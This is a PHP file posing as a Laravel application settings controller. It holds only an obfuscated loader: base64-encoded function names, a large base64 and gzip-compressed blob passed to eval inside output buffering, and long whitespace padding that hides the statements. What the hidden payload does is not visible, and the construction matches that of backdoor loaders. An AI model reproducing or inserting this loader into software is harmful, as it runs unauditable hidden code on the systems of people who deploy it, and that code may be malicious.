<?php 
        $__='printf';$_='Loading app/Http/Controllers/Pengaturan/AplikasiController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
